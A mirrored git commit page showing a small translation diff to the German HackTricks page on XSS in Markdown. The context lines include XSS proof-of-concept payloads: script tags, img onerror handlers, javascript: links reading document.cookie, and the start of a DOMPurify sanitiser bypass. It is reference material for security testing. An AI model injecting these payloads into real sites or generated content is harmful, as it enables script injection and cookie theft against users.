maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/xss-cross-site-scripting/xss-in-markdown

Browse Source
This commit is contained in:
Translator 2025-01-26 09:38:42 +00:00
parent 51e8a15b5a
commit 9becc99b53
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
View File

@ -14,7 +14,7 @@ alert(1)
</script>
<img src="x" onerror="alert(1)" />
```
Du kannst weitere Beispiele auf der [Haupt-XSS-Seite von hacktricks]() finden.
Du kannst weitere Beispiele auf der [Haupt-XSS-Seite von hacktricks](README.md) finden.
### Javascript-Links
@ -33,7 +33,7 @@ t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
```
### Missbrauch der Img-Event-Syntax
### Img-Event-Syntax-Missbrauch
```markdown
![Uh oh...](<"onerror="alert('XSS')>)
![Uh oh...](<https://www.example.com/image.png"onload="alert('XSS')>)
@ -42,7 +42,7 @@ t:prompt(document.cookie))
```
### HTML Sanitiser Markdown Bypass
Der folgende Code **bereinigt HTML-Eingaben** und **übergibt sie an den Markdown-Parser**, dann kann XSS ausgelöst werden, indem Missinterpretationen zwischen Markdown und DOMPurify ausgenutzt werden.
Der folgende Code **bereinigt HTML-Eingaben** und übergibt sie dann an den Markdown-Parser. Dadurch kann XSS ausgelöst werden, indem Missinterpretationen zwischen Markdown und DOMPurify ausgenutzt werden.
```html
<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>